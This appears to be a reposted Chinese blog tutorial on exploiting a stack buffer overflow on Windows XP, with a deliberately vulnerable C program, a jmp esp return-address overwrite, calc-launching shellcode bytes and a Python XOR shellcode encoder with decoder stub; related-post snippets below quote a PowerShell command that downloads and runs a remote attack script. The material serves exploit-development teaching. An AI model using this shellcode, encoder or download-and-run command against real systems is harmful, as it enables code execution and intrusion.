Windows Pwn - stack overflow

最新推荐文章于 2024-09-16 19:31:40 发布
最新推荐文章于 2024-09-16 19:31:40 发布
阅读量410 收藏 1
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/iamstudy/articles/windows_pwn_stack_overflow.html
版权

测试环境: windows xp
测试代码:

#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
int verify_password(char *password){
    int authenticated;
    char buffer[44]; // local buffer
    authenticated = strcmp(password, PASSWORD);
    strcpy(buffer,password); // overflow
    return authenticated;
}
void main(){
    int valid_flag = 0;
    char password[1024];
    FILE *fp;
    LoadLibrary("user32.dll"); // load library
    if(!(fp=fopen("password.txt","rw+"))){
        exit(0);
    }
    
    fscanf(fp,"%s",password);

    valid_flag = verify_password(password);
    if(valid_flag){
        printf("errorerror!\n\n");
    }else{
        printf("okokokok!");
    }
    fclose(fp);
}

804631-20181005165634826-743167556.jpg

ESP总是指向系统栈,并且不会被溢出的数据破坏,函数返回时,ESP所指的位置是所覆盖的返回地址的下一个位置,其中0x0012FB24处是返回地址,0x0012FB28esp指向的位置,所以可以通过溢出覆盖函数返回地址为jmp esp

流程:
1、覆盖返回地址指令为: jmp esp
2、将shellcode放到返回地址后,返回地址前可用任意填充物(最好用0x90)

现在面临的就是如何得到jmp esp指令的地址,可以从一些系统dll里面搜索,比如利用msfpescan -f -j esp /media/psf/Home/user32.dll对user32.dll搜索jmp esp

804631-20181005165644891-246029078.jpg

这里使用0x77d29353作为利用

从github上找到一个calc的shellcode: https://github.com/peterferrie/win-exec-calc-shellcode

因为文件读取会受一些字符的影响,所以需要一个shellcode编码器,下面简单的写了一个shellcode编码生成器

black_list = "00 0a 0d ff 89 0b 0c 0d 1a 09"

shellcode = '''
31 D2 52 68 63 61 6C 63 54 59 52 51 64 8B 72 30 8B 76 0C 8B 76 0C AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 54 1F 24 0F B7 2C 17 42 42 AD 81 3C 07 57 69 6E 45 75 F0 8B 74 1F 1C 01 FE 03 3C AE FF D7 58 58 61 C3
'''.strip().split(" ")

# add 0x90 as end
shellcode.append('90')

for r_ in range(1, 255):
    tmp_ = ''
    for i_ in shellcode:
        now_value = eval("0x"+i_) ^ r_
        now_value = str(hex(now_value))[2:]
        if now_value in black_list:
            break
        if len(now_value) == 1:
            now_value = '0' + now_value
        tmp_ += '\\x' + now_value
    else:
        work_xor = str(hex(r_))
        print 'Xor Key: ', work_xor
        print 'Shell Code: ',tmp_,"\n"
        break
else:
    print 'Enc ShellCode Eroor!'
    exit()

print "Encode Shellcode:"
shell_enc_code = '''
"\\x8B\\xC4"
"\\x83\\xC0\\x16"
"\\x33\\xC9"
"\\x8A\\x1C\\x08"
"\\x80\\xF3\\{}"
"\\x88\\x1C\\x08"
"\\x41"
"\\x80\\xFB\\x90"
"\\x75\\xF1"
"{}"
'''.format(work_xor[1:],tmp_)

print shell_enc_code

print "Hex: "
print shell_enc_code.replace("\"","").replace("\n","").replace("\\x"," ").strip()

## shellcode decode :
#
# "\\x8B\\xC4"          // mov eax,esp
# "\\x83\\xC0\\x16"     // add eax,16H
# "\\x33\\xC9"          // xor ecx,ecx
# "\\x8A\\x1C\\x08"     // mov bl,byte ptr ds:[eax + ecx] 
# "\\x80\\xF3\\{}"      // xor bl,xxx
# "\\x88\\x1C\\x08"     // mov byte ptr ds:[eax + ecx],bl
# "\\x41"               // inc ecx
# "\\x80\\xFB\\x90"     // cmp bl,90h
# "\\x75\\xF1"          // jnz short decode

这里需要注意的几点是
1、当时按照书上的例子调试发现,一开始eax的值存在问题,指向不到正确的shellcode位置,所以在一开始的时候增加了mov eax,esp
2、循环xor decode的时候,为了方便设置了一个90h作为真正的shell code结尾符

804631-20181005165657295-1639757636.jpg

Pwned!

804631-20181005165709013-824700576.jpg

转载于:https://www.cnblogs.com/iamstudy/articles/windows_pwn_stack_overflow.html

dengzhasong7076
关注
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 619
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
18.9.16 PWN2----Stack Overflow
qq_42192672的博客
09-16 318
还是cgctf的题目 拖进IDA 来说一说fgets(..)函数 原型  char *  fgets(char * s, int n,FILE *stream); 参数: s: 字符型指针,指向存储读入数据的缓冲区的地址; n: 从流中读入n-1个字符; stream : 指向读取的流。 我们可以看到main中有两个函数,menu和message,(函数列表中还有pwnme函数,...
[Windows编程] stack overflow != stack buffer overflow
anjichan4261的博客
01-29 254
经常看到有人把2个概念混淆, 其实这2者是有区别的。Windows 中它们的异常代码也是不同的: STATUS_STACK_OVERFLOW (0xc00000fd ) STATUS_STACK_BUFFER_OVERRUN (0xc0000409) 下面这篇文章很好地解释了它们的不同: Stack overflow (stack exhaustion) no...
深入剖析 Windows 系统的 PWN 技术
最新发布
m0_57836225的博客
09-16 478
综上所述,Windows 系统的 PWN 技术涉及多个方面,需要攻击者具备深入的技术知识和丰富的经验。攻击者通过挖掘内核中的漏洞,利用这些漏洞来获取更高的权限,从而实现对系统的控制。通过研究权限管理的工作原理,攻击者可以找到漏洞和弱点,从而突破权限限制。例如,利用权限提升漏洞,攻击者可以从普通用户权限提升到管理员权限,进而对系统进行更广泛的控制。例如,利用注册表漏洞、服务漏洞、驱动漏洞等,攻击者可以获取更高的权限。通过内核调试,攻击者可以查看系统的内存、寄存器、线程等信息,从而更好地了解系统的运行状态。
windows pwn
sky123博客
07-13 1770
附件下载链接程序保护如下,没有开 GS 保护。 程序是一个简单的栈溢出: 利用方法如下:这里有几个易错点: 64 位栈溢出 附件下载链接 和 32 位的程序相似,不过这里溢出字节数较少,需要栈迁移。 ORW 如果题目开启了 保护禁用了 ,那么我们就需要采用 ORW 的方式获取 flag 。Windows 中的 ORW 示例代码如下,其中 和 位于 , 位于 。 由于传递的参数过多 gadget 不好找并且会导致 ROP 过长,因此采取 修改内存属性写 shellcode 的方式 进行 OR
windows pwn 基础知识
sky123博客
06-21 5014
在 Win10 和 Win Server2016 版本之前,只有一种堆类型 NT Heap在 Win10 和 Win Server2016 之后,引入了 Segment Heap(段堆)在之后版本中,除了 UWP 程序之外 一般都继续使用 NT Heap 进行堆管UWP(Universal Windows Platform)是 Win10 引入的一种新的应用程序开发模型,他们采用了一套共享的 API。所以采用 UWP开发的程序,可以在所有 Win10 设备上运行。
#WP ELF x86 - Stack buffer overflow - C++ vtables
dydxdz的博客
03-12 1479
题目地址:rootme 0x01 题目分析 Source Code: #include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;ctype.h&gt; #include &lt;stdio.h&gt; // g++ -m32 ch20.cpp -o ch20 -...
ctf-pwn-堆—IO_FILE
xy_369的博客
05-26 373
ctf-pwn-堆—文件IO 教程
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2138
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2385
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
攻防世界PWNstackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 2144
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后...
WinPwn:内部Windows Penetrationtest AD-Security的自动化
04-29
WinPwn 在过去的许多内部渗透测试中,由于缺少代理支持,我经常遇到有关现有Powershell Recon / Exploitation脚本的问题。 我还经常一个接一个地运行相同的脚本,以获取有关当前系统和/或域的信息。 为了自动化尽可能多的内部渗透测试过程(侦察和开发),并且出于代理的原因,我编写了具有自动代理识别和集成功能的脚本。 该脚本主要基于其他知名的大型进攻性安全性Powershell项目。 欢迎任何建议,反馈,请求和评论! 只需使用以下命令导入模块: Import-Module .\WinPwn.ps1或iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') 要绕过AMSI,请采
windows-PWN小计
doudoudedi
09-26 1269
windows-pwn
winpwn学习(一)
qq_38843883的博客
01-28 1628
本系列记录winpwn学习的全过程,从最简单的栈溢出开始入门winpwn,后期会分析一些经典的cve,在学习安全之余修炼调试技巧 调试工具Nanocode(https://www.nanocode.cn/#/download),调试binaryhttps://www.root-me.org/en/Challenges/App-System/PE32-Stack-buffer-overflow-basic 可以自己编译源码文件,记得关掉相应的保护。 先用ida看看漏洞点,很明显0x041147A处的buff
pwn
IX2700123456的博客
08-16 221
0x1.连接 1 r = remote('目标IP或Url',端口号) 2 r = process('./文件名') 3 r = ssh(user='',address='',port=,password='') 0x2.数据交互 1 r.send(data) : 发送数据。 2 r.sendline(data) : 发送一行数据,相当于在数据末尾加\n。 3 ...
pwnwindows无法正确interactive
amber_o0k的博客
11-15 863
cmd和powershell运行pwntools写的py文件有问题,体现为interactive后找不到相关的linux命令,由此引申到vscode也不行。并不是你的脚本有问题,而是windows这些命令行的问题,编码格式?ansi,vt标准之类的?不确定 建议使用pycharm,wsl,虚拟机运行相关文件。 ...
【CTF pwnWindows下尝试栈溢出执行任意函数
hans774882968的博客
02-18 4032
buu-ciscn_2019_n_1是一道可以通过栈溢出修改变量为所需值的入门pwn。这题有两个解法,我受到这题的启发,搞一个Windows版本的小实验。 目标:执行函数func。 环境:Windows10,编译出的exe是32位的;小端存储。 编译命令:g++ 1.cpp -g -o 1.exe,g++版本: Thread model: win32 gcc version 8.2.0 (MinGW.org GCC-8.2.0-5) 作者:hans774882968以及hans774882968 文章目录
pwn学习(一)
weixin_33701617的博客
08-12 1277
实战前的准备 pwn在ctf中算是一个门槛较高的分支,而且这方面的资料也相对较少,所以学习pwn的人也是相对较少的。我本人呢,是一个菜鸟,本科不是计算机系的,学习这个完全是出于兴趣。写这些东西,一来是记录自己的学习状况,二来呢,就是希望给正准备踏上pwn这条路的朋友们,提供一点思路。 废话不多说,开始进入正题: 1. 学习pwn所需要的...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值